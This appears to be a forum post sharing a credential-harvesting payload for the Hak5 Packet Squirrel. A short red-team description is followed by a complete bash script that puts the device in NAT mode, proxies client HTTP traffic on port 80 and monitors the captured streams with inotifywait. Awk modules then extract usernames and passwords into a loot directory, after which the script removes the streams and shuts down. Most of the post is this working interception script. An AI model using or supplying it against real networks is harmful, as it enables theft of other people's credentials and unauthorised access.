01-09-2026, 10:52 PM
This payload uses inotifywait and DYNAMICPROXY to monitor the HTTP POST data streams generated by a client and extract sensitive information using awk. Credential harvesting is the method of obtaining credentials — think usernames and passwords. Many techniques are used to obtain credentials, from keylogging to credential dumping. With a set of credentials in hand, red teamers may access systems and make lateral movement across the network, as well as creating their own credentials which may be difficult to detect in a breach. See all credential payloads.
This payload is for the Packet Squirrel ONLY which can be purchased on hak5.org
This payload is for the Packet Squirrel ONLY which can be purchased on hak5.org
Code:
PAYLOAD_SWITCH="/root/payloads/$(SWITCH)"
readonly PAYLOAD_SWITCH
readonly PAYLOAD_LOOTS="${PAYLOAD_SWITCH}/loots"
readonly LOOTS_CREDENTIALS="${PAYLOAD_LOOTS}/credentials"
readonly LOOTS_STREAMS="${PAYLOAD_LOOTS}/streams"
readonly PAYLOAD_MODULES="${PAYLOAD_SWITCH}/modules"
###########################
set -u
LED SETUP
NETMODE NAT
if [[ ! -d "${PAYLOAD_LOOTS}" ]]; then
mkdir -p "${LOOTS_CREDENTIALS}" "${LOOTS_STREAMS}"
fi
LED ATTACK
credentials_search() {
inotifywait --monitor --format '%w%f' --event close_write "${LOOTS_STREAMS}" | while read -r dynamicproxy_stream; do
if [[ -f "${dynamicproxy_stream}" ]]; then
case "${dynamicproxy_stream}" in
*_CLIENT.stream)
for awk_module in "${PAYLOAD_MODULES}"/*.awk; do
awk -f "${awk_module}" "${dynamicproxy_stream}"
done
;;
esac
rm "${dynamicproxy_stream}"
fi
done
}
credentials_search &> "${LOOTS_CREDENTIALS}/$(date +%s).log" &
cs_pid="${!}"
DYNAMICPROXY CLIENT "${LOOTS_STREAMS}/http_" 80 &
dp_pid="${!}"
LED OFF
NO_LED=1 BUTTON
LED CLEANUP
kill "${dp_pid}" "${cs_pid}"
sync
LED FINISH
poweroff